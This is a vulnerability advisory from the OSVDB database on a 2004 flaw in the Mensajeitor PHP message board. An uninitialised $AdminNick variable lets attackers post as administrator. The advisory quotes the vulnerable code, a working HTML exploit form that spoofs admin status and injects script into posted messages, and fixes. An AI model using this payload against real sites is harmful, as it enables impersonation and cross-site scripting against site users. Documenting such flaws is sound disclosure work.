Mensajeitor Code Injection Admin Spoof

2004-07-21T05:10:36
ID OSVDB:8124
Type osvdb
Reporter Jordi Corrales(jordi@shellsec.net)
Modified 2004-07-21T05:10:36

Description

Vulnerability Description

Mensajeitor contains a flaw that will allow an attacker to post a message as an adminstrator. The problem is that there is no default value for the $AdminNick variable in mensajeitor.php causing checks to this variable to potentially be bypassed allowing an attacker to impersonate the administrator and post messages with higher privilegies.

Technical Description

Vulnerable code:

for($i=0;$i<count($NicksRegs);$i++) { list($admin_nick,$admin_pass) = explode(":",$NicksRegs[$i]);

if ($nick == $admin_nick) {
   $cadena_final .= "&lt;span class=\"admin\"&gt;".$nick."&lt;/span&gt;";
   $AdminNick = "si";
}

}

if ($AdminNick != "si") { $cadena_final .= "<acronym title='".nickinfo($nick_info)."'>$nick</acronym>"; }

As can be seen in the previous code, the default value for $AdminNick is not given, and if both checks fails no value is set by the code. This allows a remote attacker to set himself as part of the admin group by simply providing a default value for the $AdminNick parameter. This opens up the product to different types of attack, one of them is HTML and code injection attacks.

Exploit code:

< html> < head>< title>Mensajeitor Exploit</title></head> < body> Inyeccion codigo en Mensajeitor =< v1.8.9 r1< br>< br>

< form name="form1" method="post" action="http://www.victima.com/mensajeitor.php"> < input type="text" name="nick" size="10" value="Nick" maxlength="9">< br> < input type="text" name="titulo" size="21" value="Mensaje">< br> < input type="text" name="url" size="21" value="http://">< br> < input type="hidden" name="AdminNick" value="si">< br> Introduce codigo a insertar (</table> debe incluirse al principio)< br> < input type="text" name="cadena_final" size="75%" value="</table>< script>alert('hacked ;)')</script>">< br> < input type="submit" name="enviar" value="Enviar" class="form">< br> </form>

MensajeitorPHP propiedad de aaff.< br> By Jordi Corrales (Shell Security Group, http://www.shellsec.net) </body></html>

Solution Description

Upgrade to version 1.8.9 R2 or higher, as it has been reported to fix this vulnerability. It is possible to correct the flaw by implementing the following workarounds:

In mensajeitor.php, before the line

$nick = htmlspecialchars($nick);

insert this PHP code:

if ($cadena_final) { unset($cadena_final); }

Another possible workaround for versions 1.8.x is to set the register_globals directive of php.ini to off.

Short Description

Mensajeitor contains a flaw that will allow an attacker to post a message as an adminstrator. The problem is that there is no default value for the $AdminNick variable in mensajeitor.php causing checks to this variable to potentially be bypassed allowing an attacker to impersonate the administrator and post messages with higher privilegies.

References:

Vendor URL: http://www.mensajeitor.com/ Other Advisory URL: http://www.shellsec.net/leer_advisory.php?id=4 Other Advisory URL: http://www.securiteam.com/unixfocus/5UP0R0ADFW.html ISS X-Force ID: 16753 Generic Informational URL: http://cyruxnet.org/foro/viewtopic.php?t=499